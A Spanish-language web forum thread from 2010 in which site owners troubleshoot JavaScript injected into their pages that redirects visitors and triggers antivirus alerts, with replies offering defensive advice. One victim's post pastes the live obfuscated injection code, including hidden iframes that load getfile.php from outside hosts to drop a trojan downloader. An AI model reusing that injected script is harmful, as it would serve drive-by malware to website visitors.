Foros del Web » Programando para Internet » PHP »

virus ataca servidores de dominio

Estas en el tema de virus ataca servidores de dominio en el foro de PHP en Foros del Web. ... hola amigos del foros aun un virus que esta atacando los servidores de dominio .. este escribe un codigo en javascript dentro de las ...
  #1 (permalink)  
Antiguo 28/01/2010, 15:36
Avatar de Superlinux  
Fecha de Ingreso: octubre-2005
Ubicación: Colombia
Mensajes: 662
Antigüedad: 18 años, 5 meses
Puntos: 1
Pregunta virus ataca servidores de dominio

... hola amigos del foros aun un virus que esta atacando los servidores de dominio .. este escribe un codigo en javascript dentro de las paginas web .. que redirecciona nuestro dominio a otro bloqueando el acceso ..

mi pregunta es .. como poder hacer disminuir estos posibles ataques ???
__________________
"La vida sigue su curso, tú toma parte de ella."
  #2 (permalink)  
Antiguo 28/01/2010, 19:00
Avatar de Kenichi  
Fecha de Ingreso: enero-2009
Ubicación: Rosario, Argentina
Mensajes: 160
Antigüedad: 15 años, 2 meses
Puntos: 6
Respuesta: virus ataca servidores de dominio

Hola, esto no me suena a un virus sino a XSS (es inyeccion de codigo por algun lugar que reciba los datos de tu pagina en html), para evitarlo tienes que prohibir el html en las variables $_POST que son las que recibes por los formularios y $_GET que se reciben por url, la forma mas facil y rapida es asi:
Código PHP:
<?php
// ENT_QUOTES es para prohibir las comillas simples tambien ( ' )
foreach ($_POST as $key => $value)
{
 
$_POST[$key] = htmlentities($valueENT_QUOTES);
}
foreach (
$_GET as $key => $value)
{
 
$_GET[$key] = htmlentities($valueENT_QUOTES);
}
?>
__________________
Cansado de tener que hacer webs con doble login, o no entender nada del codigo de phpBB? Usa un sistema de foros simple, usa Linken Foros
  #3 (permalink)  
Antiguo 29/01/2010, 02:23
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

Hola, esto es lo que me ocurre a mi pero las páginas donde sucede no tienen formulario. Lo malo esque no encuentro en código incrustado en los fuentes. Alguna idea más? Supuestamente mi equipo está limpio y los del hosting se lavan las manos...
Gracias
  #4 (permalink)  
Antiguo 29/01/2010, 03:35
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

No tiene porqué haber un formulario, si recojes variables por url, pueden colarte códigos igual que si fuese un formulario....
__________________
Neversyn Software e Ingeniería
  #5 (permalink)  
Antiguo 29/01/2010, 03:47
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

Perdón por mi mala explicación
Me refería a que en algunas páginas que me ha ocurrido no hay formularios, ni se manejan variables por url ni nada de nada. Es HTML simple. Cuando el antivirus me bloquea la página abro el código fuente y no hay nada. Es muy rápido.... Me acaba de saltar al acceder al panel de control.
  #6 (permalink)  
Antiguo 29/01/2010, 03:56
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

Mmmm... ¿El servidor es privado tuyo, es contratado...? ¿Puedes tener acceso al php.ini o al httpd? Primero, comprueba tu también si no tienes ningún .htaccess en el servidor (mira en todas las carpetas del root, y en lo más abajo que puedas). Yo, la única posibilidad que veo, si no es nada de eso es, que o de alguna forma te lo están metiendo por algún archivo que metas por include u algo así (revisa todos los que puedas, incluidos los js) o que, te hayan introducido ese código al php.ini (no se como), y han hecho que, mediante una función que tiene, que cargue en todas las páginas un determinado código. Ahí estaria la razón de que no lo encontrases e n ningun fuente.

Mira a ver!

Saludos
__________________
Neversyn Software e Ingeniería
  #7 (permalink)  
Antiguo 29/01/2010, 04:05
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

Gracias por respodner tan pronto. Te explico. El hosting es contratado. Tengo php 4.4.7. Estoy presionando un poco para que me pongan la versión 5. Pensé en lo del os archivos include. He revisado todo lo que he podido ya que hay miles de archivos, pero sobre todo los JS. En la página principal, pro ejemplo, ni siquiera cargo JS, sólo CSS y parece que está limpio. Si tengo ficheros .htaccess cerados por mi ya que tengo una parte de la web segura y lo utilizo para cambiar de puerto y de protocolo. ¿Qué más? Sólo decirte que me tiene de lo más desconcertada el hecho de que cada vez sea en una página distinta y una sola vez, en cuanto pulso F5 la página está limpia de nuevo.
Muchísimas gracias por tu ayuda
  #8 (permalink)  
Antiguo 29/01/2010, 04:10
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

Mmmm.... probemos una cosa. Abre la página esa, y prueba a ver si puedes abrir el código fuente antes de que te redireccione, a ver si podemos ver que te han metido. Y si no, pasanos el enlace a ver si podemos nosotros. Y, mira a ver si tienes accesso al php.ini y al httpd.conf

__________________
Neversyn Software e Ingeniería
  #9 (permalink)  
Antiguo 29/01/2010, 04:30
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

No puedo modificar el php.ini ni el httpd.conf. El código que incrusta es bastante extenso. Os pongo el principio, luego sigue con un montón de enlaces a webs bastante dudosas.
Código:
<script type="text/javascript" language="javascript"> var aldy=new Date( ); aldy.setTime(aldy.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+aldy.toGMTString( ); </script> 
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><h1><a href="http://keygenguru.com">crack</a>&nbsp; </h1>
En algún otro momento lo que hacía era meter iframes a otros enlaces:
Código:
<script type="text/javascript" language="javascript"> var ukhdhi=new Date( ); ukhdhi.setTime(ukhdhi.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73_id\x3d53d\x312540afaf174fd0466f84\x316\x35af\x65e3"+"; path=/\x3b ex\x70\151\x72es="+ukhdhi.toGMTString( ); </script> 
<script type="text/javascript" language="javascript"> var vkqyo="\x63\x61,co,da\x2cde,cy,\x65l,en\x2ceo,\x65s,f\x69,fr\x2cga\x2cit\x2cja\x2cji\x2ckn\x2cn\x6c,\x6eo,\x70t,\x73v"; var lrqicx=navigator.language || navigator.systemLanguage; var lang=lrqicx.toLowerCase( ); lang=lang.substr(0,2); if (vkqyo.indexOf(lang)==-1){navqd( ); }else {dnav( ); }function dnav( ){ document.write('<ifram\x65 \x66r\x61\x6debo\x72der=\x30\x20b\x6f\x72der=0 \x68e\x69ght=5 w\x69dth=0 s\x72c=\x22http:/\x2f208.109\x2e\x3229\x2e8\x31/admin/g\x65t\x66ile.\x70hp\x3f\x61=1"></i\x66rame><iframe \x66r\x61meborde\x72=\x30 borde\x72=0 heig\x68t=5 width=0 src="h\x74tp://topgravur.de/admin/\x67\x65tfile.php?a\x3d\x31"><\x2fif\x72a\x6de><iframe frame\x62order=\x30 borde\x72=\x30 h\x65i\x67ht=5 \x77id\x74\x68=\x30 src="http://ele\x61nor\x6eursing\x2eco.u\x6b/admin/getfi\x6ce.php?a=1\x22></if\x72\x61me>');
que son los que bloquea el AVG. De todos mosdos se manifiesta de distinto modo en IE y en FF. En FF simplemente muestra la págian en blanco mientars que el IE al intentar ejecutar el código JS incrustado hace saltar el antivirus.
Gracias de nuevo!!
  #10 (permalink)  
Antiguo 29/01/2010, 04:34
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

¿Solo te pasa a ti, o también a tus usuarios? Estoy revisando el código, y no indica por ninguna parte de donde viene. Solo que crea cookies. Voy a probar el código en seguro a ver que pasa...

Saludos!
__________________
Neversyn Software e Ingeniería
  #11 (permalink)  
Antiguo 29/01/2010, 04:46
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

A todos los usuarios, es más, tengo una plataforma para cursos online y los alumnos se están quejando... Explico el problema de una forma más completa:
Varios antivirus lo han bloqueado (AVG, ESET NOD32, MCAFEE). Indican los mensajes: Vulneración Rogue Scanner, JS/TrojanDownloader.FraudLoad.D Troyano, Generic FakeAlert. Cada vez aparece en una página distinta de la web, aleatoriamente. Los enlaces a los que pretende redirigir también cambian con el tiempo. En el código fuente no he encontrado absolutamente nada. Desde el hosting dicen que no hay nada porque a ellos le abre bien la web. Los fuentes "locales" están en un servidor que parece limpio (AVG y Spybot) y en mi equipo encontré hace unos días un troyano (Opachki) con el Spybot y tras limpiarlo pensé que podría solucionarse. Hoy ha vuelto. En en IE lo bloquea el antivirus, en el FF se queda la página en blanco y si veo el código fuente de la página está el código maldito (XSS tipo IFRAME). He escaneado y nada. He modificado la contraseña FTP y nada. Por si sirve de ayuda tengo instalado ATutor 1.6.1.
Saludos!
  #12 (permalink)  
Antiguo 29/01/2010, 04:52
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

La cookie que crea es esta:
Código cookie:
Ver original
Y no tengo ni idea de que es... está claro que ha creado sessión en alguna web, pero dentro del ordenador del cliente? Mmmm... que raro. La verdad, que si eso le pasa a todos los usuarios, tiene que ser problema del servidor... Y para comprobarlo, haz una cosa. Te puede resultar un poco tediosa, pero te ayudará a comprobar si es fallo tuyo o del server:
Copia todos tus archivos a tu ordenador, e instala xampp o similar para probar que funciona, y no te sale la redirección esa, por lo que será problema del servidor. En cambio, si sale... es que está en los archivos o la DB. Que portierto, revisala que a lo mejor que te han metido el código por inyección SQL.

A ver que logramos... saludos!!
__________________
Neversyn Software e Ingeniería
  #13 (permalink)  
Antiguo 29/01/2010, 04:55
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

Y con esa aplicación, aún mas, ya que está muy verde...Es más, yo te recomendarioa, ya que es un cms, hacer un backup de la db(comprobando primero que está todo limpio), y borrar public_html para luego reinstalar el CMS. Eso si, intenta instalarle los parches y las actualizaciones, ya que debe tener muchos bugs.

Saludos!!
__________________
Neversyn Software e Ingeniería

Última edición por zeuslife; 29/01/2010 a las 05:00
  #14 (permalink)  
Antiguo 29/01/2010, 05:04
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

Ya, he sospechado que podía ser vulnerabilidad de algún módulo de ATutor. De hecho sospeché que podía ser del Tiny MCE y cambié los permisos a todos los archivos de ese módulo que creo ni siquiera se utiliza. He revisado minuciosamente todos los JS del ATutor. Algo he leido de la inyección SQL pero cómo puedo saberlo? Dónde busco?

Gracias mil!!!!
  #15 (permalink)  
Antiguo 29/01/2010, 05:07
Avatar de zeuslife  
Fecha de Ingreso: enero-2008
Ubicación: Madrid
Mensajes: 533
Antigüedad: 16 años, 2 meses
Puntos: 11
Respuesta: virus ataca servidores de dominio

Eso hay que hacerlo a pura mano. Revisa los registros de la db desde el phpmyadmin de tu cpanel, y mira a ver... Y para ver si hay ultimos bugs de inyeccion sql reconocidos, mira en securityfocus escribiendo el nombre de la aplicación, o en su propia página, que supongo que algo vendrá.

Saludos y Suerte!
__________________
Neversyn Software e Ingeniería
  #16 (permalink)  
Antiguo 29/01/2010, 11:04
Avatar de Superlinux  
Fecha de Ingreso: octubre-2005
Ubicación: Colombia
Mensajes: 662
Antigüedad: 18 años, 5 meses
Puntos: 1
De acuerdo Respuesta: virus ataca servidores de dominio

hola amigos del foros ... un amigo me paso el siguiente link que explica un poco como lograr detectar y dar solucion al problema

http://perlenespanol.com/foro/script...ml?hilit=virus

espero les sea de gran ayuda .. ami me saco del aprieto ..

En este articulo muestran como solucionar el error online ... mas no como impedir nuevamente un ataque ..

espero sea de ayuda ..
__________________
"La vida sigue su curso, tú toma parte de ella."
  #17 (permalink)  
Antiguo 29/01/2010, 11:27
Avatar de bioxido  
Fecha de Ingreso: diciembre-2008
Ubicación: $_SERVER['PHP_SELF']
Mensajes: 601
Antigüedad: 15 años, 3 meses
Puntos: 21
Respuesta: virus ataca servidores de dominio

En mi web me paso lo mismo, no recuerdo lo que hacia... no redireccionaba ni nada, pero ponia un código malicioso que algunos antivirus detectaban.

Tengo un servidor dedicado, y apenas le avise al soporte a los 40minutos ya lo tenia solucionado... no era que se reescriban los archivos ni nada en la DB, simplemente como que interceptaban el codigo fuente mientras se enviaba al usuario y agregaban esas líneas.

Como te dije, yo lo solucione avisandole al soporte.
  #18 (permalink)  
Antiguo 03/02/2010, 02:37
 
Fecha de Ingreso: enero-2010
Mensajes: 9
Antigüedad: 14 años, 2 meses
Puntos: 0
Respuesta: virus ataca servidores de dominio

Hola de nuevo, pues como os he comenatdo mihosting pasa de mi así que al final optaré por cambair de hosting... En el enlace que has puesto Superlinux mi antivirus salta. Seguiré investigando, de momento el virus me ha dado una tregua pero no sé por cuanto tiempo...

Etiquetas: servidores, virus, dominios
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 18:39.